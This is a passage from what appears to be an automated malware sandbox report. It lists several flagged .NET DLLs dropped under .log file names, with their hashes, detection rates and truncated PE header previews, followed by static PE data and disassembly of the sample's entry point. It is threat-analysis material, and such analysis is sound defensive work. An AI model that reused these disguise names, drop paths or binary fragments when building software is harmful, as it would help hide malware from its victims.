                                                                                                                  • Filename: based.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 4Awb1u1GcJ.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                  C:\Users\user\Desktop\HnGdNOQQ.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):24576
                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\QRPSxHgy.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\UFpBXUVk.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\WzsROUza.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\YuXIhBvf.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32768
                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\ZlAIxOci.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\aEtIhTbg.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                  C:\Users\user\Desktop\jYCYFtEB.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):89600
                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                  C:\Users\user\Desktop\pQfxiZJp.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32768
                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\vCAeICGo.log

                                                                                                                  Download File
                                                                                                                  Process:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):89600
                                                                                                                  Entropy (8bit):5.905167202474779
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                  C:\Users\user\Desktop\vJIWLFOd.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):24576
                                                                                                                  Entropy (8bit):5.535426842040921
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                  \Device\Null

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):502
                                                                                                                  Entropy (8bit):4.6048426069826895
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:PZ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:LdUOAokItULVDv
                                                                                                                  MD5:3772C8A6BE7A12366E9B4E96F4489643
                                                                                                                  SHA1:4E93A70C1604E3A378B0A6330BD7C7C4CE7AB6DE
                                                                                                                  SHA-256:815727123D8C135F839CC45D3AB906B47EEAC9FE23AF26CBBB5B931E56F975AA
                                                                                                                  SHA-512:C19DF3B7E1A809E7B7093A8F8C60D7E60DEA489D8F7D614D454E815A16D7F92363B439E380FADBA1CCA0BEEED2915855BF168E79A3D6DE49DF4BE46A29759767
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 045012 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.505513225724165
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:file.exe
                                                                                                                  File size:2'331'371 bytes
                                                                                                                  MD5:c9059dfb76ad9e011d4e11608ccc98cc
                                                                                                                  SHA1:c7ec739a977cc99a19e39103e2a20d59a6094508
                                                                                                                  SHA256:906e30690506eb761b3f84f7ae1146db9dc796e60d87303173fc99370485c58f
                                                                                                                  SHA512:da494d85e5689c65f2369bcff41479ec9a797322c761e18138c1e2397e0879986dc9bca64d9cdc20999902db90fdec8f94ad36184997d396433ab1a7c2e1b9ce
                                                                                                                  SSDEEP:49152:IBJR1ijXQywiXW604Jjh42gv9Gk2AWDpL5mlP:yr1IZXWCJjhZgHW1N4P
                                                                                                                  TLSH:B2B5C046BAD34E73C1943F7188D7102D82B1DE363536EF8B3A0F6995AC161728A162F3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                  File Icon

                                                                                                                  Icon Hash:1515d4d4442f2d2d

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  call 00007F825CC147ABh
                                                                                                                  jmp 00007F825CC140BDh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F825CC06F07h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007F825CC1754Fh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007F825CC1424Ch
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007F825CC13809h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F825CC06E82h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F825CC17009h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F825CC141C8h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F825CC16FECh
                                                                                                                  int3
                                                                                                                  jmp 00007F825CC18A87h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

